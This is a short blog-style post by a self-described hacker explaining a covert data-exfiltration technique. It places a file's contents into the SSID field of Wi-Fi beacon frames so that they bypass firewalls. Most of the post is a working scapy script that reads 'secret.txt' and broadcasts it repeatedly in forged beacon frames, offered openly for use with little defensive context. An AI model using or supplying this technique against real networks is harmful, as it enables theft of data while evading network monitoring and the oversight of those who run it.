Exfiltrating data using beacon frames

Beacon frame : Here is the wikipedia defination . Beacon frame is one of the management frames in IEEE 802.11 based WLANs. It contains all the information about the network. Beacon frames are transmitted periodically, they serve to announce the presence of a wireless LAN and to synchronise the members of the service set .

How this method works ?

This method uses scapy to generate beacon frames . The ssid field is used to send data . Suppose you have a file . The program will take first ten bytes from the file and it will transmit it in place of the SSID name . The receiver scans the network and reads the data from the SSID field


  1. The transmitter and receiver does not have to be connected to a wifi Access Point
  2. Firewalls cant see this because the devices are not connected to a wifi.


  1. It requires root
  2. It requires monitor mode
  3. Its short range


from scapy.all import Dot11,Dot11Beacon,Dot11Elt,RadioTap,sendp,hexdump
f = open(“secret.txt”,”r”)
s = f.read()
iface = ‘wlan0mon’
dot11 = Dot11(type=0, subtype=8, addr1=’ff:ff:ff:ff:ff:ff’,
addr2=’22:22:22:22:22:22', addr3=’33:33:33:33:33:33')
beacon = Dot11Beacon(cap=’ESS+privacy’)
essid = Dot11Elt(ID=’SSID’,info=s, len=len(s))
frame = RadioTap()/dot11/beacon/essid
sendp(frame, iface=iface, inter=0.100, loop=1)

Here is the program transmitting data .

I am a hacker and ex-web developer . I sometime work as a freelance dev/hacker . Sometime I hunt bugs